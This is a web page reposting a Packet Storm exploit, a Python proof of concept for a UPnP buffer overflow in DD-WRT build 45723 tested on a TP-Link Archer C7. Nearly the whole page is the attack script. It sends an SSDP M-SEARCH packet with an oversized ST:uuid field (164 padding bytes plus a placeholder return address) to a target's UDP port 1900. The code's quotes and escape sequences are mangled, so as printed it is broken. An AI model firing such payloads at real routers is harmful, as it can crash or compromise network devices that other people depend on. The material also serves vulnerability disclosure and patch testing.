DD-WRT 45723 Buffer Overflow ≈ Packet Storm – Digitalmunition




Exploit/Advisories no-image-featured-image.png

Published on April 1st, 2021 📆 | 7176 Views ⚑

0

DD-WRT 45723 Buffer Overflow ≈ Packet Storm

# Exploit Title: DD-WRT 45723 – UPNP Buffer Overflow (PoC)
# Date: 24.03.2021
# Exploit Author: Selim Enes ‘Enesdex’ Karaduman
# Vendor Homepage: https://dd-wrt.com/
# Software Link: https://download1.dd-wrt.com/dd-wrtv2/downloads/betas/2021/
# Version: 45723 or prior
# Tested on: TP-Link Archer C7

# https://ssd-disclosure.com/ssd-advisory-dd-wrt-upnp-buffer-overflow/

import socket

target_ip = “192.168.2.1” # IP Address of Target
off = “D”*164
ret_addr = “AAAA”

payload = off + ret_addr

packet =
‘M-SEARCH * HTTP/1.1rn’
‘HOST:239.255.255.250:1900rn’
‘ST:uuid:’+payload+’rn’
‘MX:2rn’
‘MAN:”ssdp:discover”rn’
‘rn’

s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM, socket.IPPROTO_UDP)
s.sendto(packet, (target_ip, 1900) )

Source link

Tagged with:



Leave a Reply